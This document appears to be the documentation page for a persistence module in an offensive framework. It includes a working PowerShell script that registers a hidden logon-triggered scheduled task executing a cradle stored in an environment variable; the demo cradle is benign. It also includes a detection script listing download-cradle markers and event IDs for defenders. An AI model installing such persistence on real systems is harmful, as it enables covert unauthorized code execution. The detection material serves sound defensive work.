Description
Installs persistence by creating a scheduled task to run a PowerShell cradle on user logon.
Overview
Installs persistence by creating a scheduled task that runs a PowerShell cradle at logon. The cradle text itself is stored in a user environment variable and the task's action only references that variable, so the cradle does not appear in the task's command line. At trigger time the task executes the contents of the named environment variable as the current user. Note that this reduces rather than removes the artifacts available to defenders: the variable value sits in plaintext in the registry (HKCU\Environment for user scope), and the task action still exposes the variable name and the invocation pattern.
Arguments
| Parameter | Type | Description |
|---|---|---|
| TaskName | string | The name of the scheduled task. |
| EnvironmentVariableName | string | The name of the environment variable that will hold the PowerShell cradle. |
| Trigger | string | The event that fires the scheduled task and so runs the cradle (OnLogon in the example output below). |
| Build | string | The Specter build identifier. |
Dependencies
- None
Operating Systems
- Windows
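The following is an added, illustrative reimplementation of the technique this module describes, so the install, verification and uninstall steps can be seen end to end. It is not Specter's own code: the function names, the `-Cradle` parameter and the benign marker cradle (which only writes a timestamp file) are assumptions made for the example, and the default TaskName and EnvironmentVariableName are taken from the example output.

```powershell
# Added, illustrative reimplementation of the technique this module describes.
# Not Specter's code: function names, the -Cradle parameter and the marker cradle
# below are assumptions made for this example.
param(
    [string]$TaskName                = 'CacheTask',
    [string]$EnvironmentVariableName = 'GPO_AUX',
    # Constructed, benign stand-in for a real download cradle: it just drops a timestamp.
    [string]$Cradle = 'Set-Content -Path "$env:TEMP\cradle-ran.txt" -Value (Get-Date)'
)

function Install-EnvVarTask {
    param([string]$TaskName, [string]$VarName, [string]$Cradle)

    # 1. Park the cradle in a User-scope variable; this writes HKCU\Environment.
    [Environment]::SetEnvironmentVariable($VarName, $Cradle, 'User')

    # 2. The task action carries only a reference to the variable, never the cradle text.
    #    Built from single-quoted pieces so $env: is not expanded while installing.
    $command   = 'IEX $env:' + $VarName
    $arguments = '-NoProfile -NonInteractive -WindowStyle Hidden -Command "' + $command + '"'
    $action    = New-ScheduledTaskAction -Execute 'powershell.exe' -Argument $arguments

    # 3. Fire at logon of the current user and run in that user's interactive session.
    #    No elevation is required; RunLevel stays at the default (Limited).
    $user      = "$env:USERDOMAIN\$env:USERNAME"
    $trigger   = New-ScheduledTaskTrigger -AtLogOn -User $user
    $principal = New-ScheduledTaskPrincipal -UserId $user -LogonType Interactive

    Register-ScheduledTask -TaskName $TaskName -Action $action -Trigger $trigger `
        -Principal $principal -Force | Out-Null
}

function Get-EnvVarTaskState {
    # What a defender sees: the task action (variable name only) and the plaintext
    # cradle sitting in the user's environment block.
    param([string]$TaskName, [string]$VarName)
    $task = Get-ScheduledTask -TaskName $TaskName -ErrorAction SilentlyContinue
    $actionText = if ($task) { "$($task.Actions[0].Execute) $($task.Actions[0].Arguments)" } else { $null }
    [PSCustomObject]@{
        TaskPresent   = [bool]$task
        TaskAction    = $actionText
        VariableValue = [Environment]::GetEnvironmentVariable($VarName, 'User')
    }
}

function Uninstall-EnvVarTask {
    # Mirrors the shape of the module's UninstallScript: delete the task, then clear
    # the variable. The variable is cleared in the same scope it was written to (User).
    param([string]$TaskName, [string]$VarName)
    $success = $true
    try {
        Unregister-ScheduledTask -TaskName $TaskName -Confirm:$false -ErrorAction Stop
    } catch {
        $success = $false
    }
    [Environment]::SetEnvironmentVariable($VarName, $null, 'User')
    [PSCustomObject]@{ TaskName = $TaskName; Variable = $VarName; Success = $success }
}

Install-EnvVarTask -TaskName $TaskName -VarName $EnvironmentVariableName -Cradle $Cradle
Get-EnvVarTaskState -TaskName $TaskName -VarName $EnvironmentVariableName
# Start-ScheduledTask -TaskName $TaskName   # fire it now instead of waiting for the next logon
# Uninstall-EnvVarTask -TaskName $TaskName -VarName $EnvironmentVariableName
```

After the next logon (or a manual Start-ScheduledTask) the marker file appears in %TEMP%, confirming the variable was resolved from the logged-on user's environment. Uninstall clears the variable in the same scope the installer wrote it to; check the scope the uninstall script actually uses when cleaning up after a real engagement.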
Example Output

```json
{
  "Persistence": {
    "Id": "2ba6265671ee44ba81f1ec40304bb17c",
    "Method": "Scheduled Task",
    "Trigger": "OnLogon",
    "Build": "92cbf1b0f92642859f28f258226cc1f3",
    "Profile": "User",
    "Event": "Create",
    "Success": true,
    "UninstallScript": "$output = (schtasks /DELETE /TN 'CacheTask' /F) -join ([System.Environment]::NewLine);\r\n$success = $output -like '*success*';\r\ntry {\r\n\t[Environment]::SetEnvironmentVariable('GPO_AUX', $null, 'Machine');\r\n} catch {\r\n\t$success = $false;\r\n\tthrow;\r\n}\r\n\r\nNew-Object PSObject -Property @{\r\n\tPersistence = New-Object PSObject -Property @{\r\n\t\tId = \"2ba6265671ee44ba81f1ec40304bb17c\";\r\n\t\tEvent = \"Delete\";\r\n\t\tSuccess = $success;\r\n\t Method = \"Scheduled Task\";\r\n\t Profile = \"User\";\r\n\t Trigger = \"OnLogon\";\r\n\t}\r\n}",
    "TaskName": "CacheTask",
    "EnvironmentVariableName": "GPO_AUX"
  }
}
```
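Two points a practitioner should take from the output above. First, the UninstallScript clears GPO_AUX at Machine scope (`SetEnvironmentVariable('GPO_AUX', $null, 'Machine')`) while the overview describes a user environment variable, so cleanup verification should check both HKCU\Environment and the Machine Environment key. Second, the technique leaves two durable artifacts: a task whose PowerShell action dereferences an environment variable, and an environment value that looks like a cradle. The hunt below, added here as an example and not part of the Specter project, checks for both across Machine scope and every loaded user hive; the marker list is an assumption and should be extended for your environment. Run it elevated so other logged-on users' tasks and hives are visible.

```powershell
# Added hunting example; not part of the Specter project or this module.
# Flags (a) scheduled tasks whose PowerShell action reads an environment variable
# or calls IEX/Invoke-Expression and (b) environment values, Machine scope plus every
# loaded user hive, that look like a cradle. The marker list is an assumption.

$cradleMarkers = @('IEX', 'Invoke-Expression', 'DownloadString', 'Net.WebClient',
                   'FromBase64String', 'Invoke-WebRequest', 'Invoke-RestMethod')

function Find-EnvVarTasks {
    foreach ($task in Get-ScheduledTask) {
        foreach ($a in $task.Actions) {
            $cmd = "$($a.Execute) $($a.Arguments)"
            # -match is case-insensitive by default; \$ keeps the literal dollar sign.
            if ($cmd -match 'powershell|pwsh' -and
                $cmd -match '\$env:|GetEnvironmentVariable|\bIEX\b|Invoke-Expression') {
                [PSCustomObject]@{
                    Kind      = 'Task'
                    Name      = "$($task.TaskPath)$($task.TaskName)"
                    Principal = $task.Principal.UserId
                    Triggers  = ($task.Triggers | ForEach-Object { $_.CimClass.CimClassName }) -join ','
                    Detail    = $cmd
                }
            }
        }
    }
}

function Find-CradleEnvVars {
    # Machine scope plus the Environment key of each currently loaded user hive.
    $keys = @('HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment')
    $keys += Get-ChildItem -Path Registry::HKEY_USERS |
             Where-Object { $_.PSChildName -notlike '*_Classes' } |
             ForEach-Object { "Registry::$($_.Name)\Environment" }
    foreach ($path in $keys) {
        $key = Get-Item -Path $path -ErrorAction SilentlyContinue
        if (-not $key) { continue }
        foreach ($name in $key.GetValueNames()) {
            # Read the raw value so REG_EXPAND_SZ entries are inspected unexpanded.
            $value = [string]$key.GetValue($name, '', 'DoNotExpandEnvironmentNames')
            $hit = $cradleMarkers | Where-Object { $value -match [regex]::Escape($_) } |
                   Select-Object -First 1
            if ($hit) {
                [PSCustomObject]@{
                    Kind      = 'EnvVar'
                    Name      = "$path\$name"
                    Principal = $null
                    Triggers  = $null
                    Detail    = "$hit : $value"
                }
            }
        }
    }
}

Find-EnvVarTasks
Find-CradleEnvVars
```

For real-time coverage rather than a point-in-time sweep, the task registration itself produces Security event 4698 when "Audit Other Object Access Events" is enabled and event 106 in Microsoft-Windows-TaskScheduler/Operational when that log is enabled, and the variable write is a registry value set under HKCU\Environment (or the Machine Environment key), which Sysmon records as event 13 given a matching rule.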